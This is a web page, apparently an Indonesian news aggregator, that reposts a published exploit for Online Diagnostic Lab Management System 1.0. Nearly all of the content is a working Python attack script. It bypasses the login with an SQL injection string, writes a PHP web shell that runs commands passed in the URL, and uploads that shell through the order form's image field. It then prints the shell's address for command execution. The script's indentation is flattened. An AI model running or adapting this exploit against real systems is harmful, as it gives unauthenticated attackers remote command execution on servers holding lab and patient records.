Sistem Manajemen Lab Diagnostik Online 1.0 Injeksi SQL / Unggah Shell

  • Whatsapp
Audio Conversion Wizard 2.01 Buffer Overflow
Audio Conversion Wizard Buffer Overflow

News.nextcloud.asia

Eksploitasi jarak jauh Sistem Manajemen Lab Diagnostik Online versi 1.0 yang melewati login dengan injeksi SQL dan kemudian mengunggah shell.

SHA-256 | a9a666adc9b5791a812164167d20c4ced022f91eed35188667143b4e7b0ee94e

# Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
# Authentication Required: bypass login with sql injection

#/usr/bin/python3

import requests
import os
import sys
import time
import random

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
# #
# Exploit Script ( Online Diagnostic Lab Management System ) #
# #
##################################################################
'''
print(logo)

url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")

req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:

print("[+] Login Successfully")
website_1 = url+"/diagnostic/php_action/createOrder.php"

upload_file = {
"orderDate": (None,""),
"clientName": (None,""),
"clientContact" : (None,""),
"productName[]" : (None,""),
"rateValue[]" : (None,""),
"quantity[]" : (None,""),
"totalValue[]" : (None,""),
"subTotalValue" : (None,""),
"totalAmountValue" : (None,""),
"discount" : (None,""),
"grandTotalValue" : (None,""),
"gstn" : (None,""),
"vatValue" : (None,""),
"paid" : (None,""),
"dueValue" : (None,""),
"paymentType" : (None,""),
"paymentStatus" : (None,""),
"paymentPlace" : (None,""),
"productImage" : (name_file,open("rev.php","rb"))
}

up = req.post(website_1,files=upload_file)
print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
print("[-] Check username or password")

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *